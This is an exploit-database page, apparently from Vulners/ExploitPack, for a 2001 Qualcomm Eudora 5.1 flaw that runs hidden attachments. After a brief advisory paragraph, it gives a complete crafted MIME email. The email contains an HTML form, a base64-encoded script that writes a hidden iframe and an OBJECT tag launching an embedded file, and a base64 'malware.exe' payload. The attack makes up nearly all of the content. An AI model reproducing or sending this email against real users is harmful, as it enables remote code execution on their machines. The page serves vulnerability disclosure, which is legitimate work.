Lucene search
K

Qualcomm Eudora 5.1 - Hidden Attachment Execution

🗓️ 29 May 2001 00:00:00Reported by http-equivType 
exploitpack
 exploitpack
👁 14 Views

Vulnerability in Qualcomm Eudora allows remote code execution via malicious email forms.

Code
source: https://www.securityfocus.com/bid/2796/info

Eudora is an email program for the Windows platform. Eudora contains a vulnerability which may make it possible for an attacker to excecute arbitrary code on a remote system even if 'allow executables in HTML content' is disabled, if the 'Use Microsoft viewer' option is enabled.

The attack can be carried out if the recipient of a maliciously crafted email 'submits' a form in the message.

This may lead to remote attackers gaining access to victim hosts.

** Eudora 5.1.1 is also stated as being vulnerable to this issue. The problem stems from Eudora not treating files with a '.MHTML' extension with caution. 

MIME-Version: 1.0
To: 
Subject: HEY!DORA
Content-Type: multipart/related;
 boundary="------------DB87F71CA55F5A135BFD6F03"


--------------DB87F71CA55F5A135BFD6F03
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
 <font color=#400040>To view the demo, please go here:</font><FORM action="cid:master.malware.com" method=post target=new><button  type=submit style="width:130pt;height:20pt;cursor:hand;background-color:transparent;border:0pt"><font color=#0000ff><u>http://www.malware.com</u></font></button> </FORM>
<img SRC="cid:master.malware.com" height=1 width=1><img SRC="cid:http://www.malware.com" height=1 width=1></html>

--------------DB87F71CA55F5A135BFD6F03
Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <master.malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.html"

PGNlbnRlcj48Yj48Zm9udCAgY29sb3I9IiMwMDAwMDAiIGZhY2U9ImFyaWFsIj4gIDxoMT5t
YWx3YXJlLmNvbTwvaDE+PC9mb250PjwvYj48L2NlbnRlcj4NCg0KDQo8c2NyaXB0Pg0KLy8g
aHR0cDovL3d3dy5tYWx3YXJlLmNvbSAtIDE4LjAzLjAxDQpkb2N1bWVudC53cml0ZWxuKCc8
SUZSQU1FIElEPXJ1bm5lcndpbiBXSURUSD0wIEhFSUdIVD0wIFNSQz0iYWJvdXQ6Ymxhbmsi
PjwvSUZSQU1FPicpOw0KZnVuY3Rpb24gbGlua2l0KGZpbGVuYW1lKQ0Kew0KICAgc3RycGFn
ZXN0YXJ0ID0gIjxIVE1MPjxIRUFEPjwvSEVBRD48Qk9EWT48T0JKRUNUICAgQ0xBU1NJRD0i
ICsNCiAgICAgICInQ0xTSUQ6MTU1ODlGQTEtQzQ1Ni0xMUNFLUJGMDEtMDBBQTAwNTU1OTVB
JyBDT0RFQkFTRT0nIjsNCiAgIHN0cnBhZ2VlbmQgPSAiJz48L09CSkVDVD48L0JPRFk+PC9I
VE1MPiI7DQogICBydW5uZXJ3aW4uZG9jdW1lbnQub3BlbigpOw0KICAgcnVubmVyd2luLmRv
Y3VtZW50LndyaXRlKHN0cnBhZ2VzdGFydCArIGZpbGVuYW1lICsgc3RycGFnZWVuZCk7DQog
fQ0KbGlua2l0KCdtYWx3YXJlLmV4ZScpOw0KPC9zY3JpcHQ+
--------------DB87F71CA55F5A135BFD6F03
Content-Type: application/octet-stream
Content-ID: <http://www.malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.exe"

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAB5AAAAngAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZjPAM/+M04PDILlw
P47D82arjMCO2LgAoI7Aw2a5APoAAGa/AAAAAGa+gQIAAGYzwGeKn0ABAAAD2MHjBCvYK9hm
wcgQA9isA9jB6wVniB9H4t7DuYA+M/8z9vNmpcMeBozYBaAPjsC4DwCO2DPAZ4oDi/C/CgC5
LAHzpIvwg8cUuSwB86QHH8OwE80Qug8Ajtq+SAO6yAMywO5CuQAD827oXP9mM9votf9T6G7/
utoD7KgIdfvsqAh0++iW/1v+w7QBzRZ04LgDAM0QuABMzSEAAAAAAAAAAAAAAAAAAACxwJAd
e4jZJmvCwYi4yaQ6i3+Tjlww2x86f41XM8GMsXeYidpr11yGfKuojiLQ2aBehdkuosNsY2xF
JL8hl47Qihq/wJsWJrKd14ots4wkSaWNKZ8th1zGx1o4l5YtKhXNpXPMrqZddaQis5+M13cm
p1awuGSEG1rZHc6vNjuYfMM4TMAaIh7PRnliYh14189t2n9soiWXyEvCyDNwpSkcGbupaRij
NJ9RYzMbOn1Xgb0gqdUjGVVMVapiGaGJIytrMHKSOVKUqDVuV8rMyMubwXFGa2FrKn5xx0mt
Ok+rwV8VZ6fEPIeQWYrXZMghvhtskLDYc5FQdUE8TFbWP6IsHLll2HbGOLVRuTO0SGSEVqig
rh2cwhuDk9tZVCJ1cK+eGX54NH1dqqFeVUa7vhTFGkVeFDvFe227QIGtetJKjj201lypxibH
mFjGfbsVvnjPxXR8daordyXBX6cjwYrP10lVVJuEilVdNR9xJZJ51c+CLiNdizWKTnYcxn4m
Ga+nMjjOSSws0BRnOS0pgzOCzq3PzSgaHjiwzkEue0hMK9KSvcuXJLg5wpxa2dNjF9dxGDAw
lmccnlBFWDCLxH+FmkzJWLMf01MgJMnW0KhaoUiSe9NwsnIqz7WPwWMtH24ctrLALrYmGbUg
uVwUPckqUSB6O7Mrzrg/kKgvz07PaCgbFL9vohyFiNCqXhi3Gh7Gf9mUbay1TFmwbsBNPaTA
WpBlOFM4YYHKpDyWKEl4hlQvYy5CZlcoK5W/WF5RlV6iPXHJqM2uwVTUvCqcdp5DnoSSq6Q7
G7+5dWVeszyMlEG1k7hZ28KH1XZgYTtHqRV+lqI4YGKAmypey6dvR4M2go9yGDePIE7YnrGb
hT6jcF+KVFstxqinaI2UHkSkFoO8mVg+xZ4VT5x4Omp/KjKfSDBHWW09qkh9rq/bcqjZ0SqY
tUm8NmsXRdI+2zexZ4CgmZ2TiZOQiJBHWGVaxMiALoCgj3eaXk/Ts5I6gRtNzSvYoVufYz7W
pxdVfHPJkMUzhYKyOXhkwTzCd4BNITeWKWlKxkpTwmWUaFSMp2h0QHnHUVFjjo2Nkls3MHJy
R6KOsYRRHaJLJlNYfFyxOpesVrfEQrw/ZYIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPAAAQ
AAARAAASAAATAAAUAAAVAAAWAAAXAAAYAAAZAAAaAAAbAAAcAAAdAAAeAAAfAAAgAAAhAAAi
AAAjAAAkAAAlAAAmAAAnAAAoAAApAAAqAAArAAAsAAAtAAAuAAAvAAAwAAAxAAAyAAAzAAA0
AAA1AAA2AAA3AAA4AAA5AAA6AAA7AAA8AAA9AAA+AAA/AAA/AAA/AAA/AQA/AgA/AwA/BAA/
BQA/BgA/BwA/CAA/CQA/CgA/CwA/DAA/DQA/DgA/DwA/EAA/EQA/EgA/EwA/FAA/FQA/FgA/
FwA/GAA/GQA/GgA/GwA/HAA/HQA/HgA/HwA/IAA/IQA/IgA/IwA/JAA/JQA/JgA/JwA/KAA/
KQA/KgA/KwA/LAA/LQA/LgA/LwA/MAA/MQA/MgA/MwA/NAA/NQA/NgA/NwA/OAA/OQA/OgA/
OwA/PAA/PQA/PgA/PwA/PwA/PwA/PwE/PwI/PwM/PwQ/PwU/PwY/Pwc/Pwg/Pwk/Pwo/Pws/
Pww/Pw0/Pw4/Pw8/PxA/PxE/PxI/PxM/PxQ/PxU/PxY/Pxc/Pxg/Pxk/Pxo/Pxs/Pxw/Px0/
Px4/Px8/PyA/PyE/PyI/PyM/PyQ/PyU/PyY/Pyc/Pyg/Pyk/Pyo/Pys/Pyw/Py0/Py4/Py8/
PzA/PzE/PzI/PzM/PzQ/PzU/PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=
--------------DB87F71CA55F5A135BFD6F03--

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation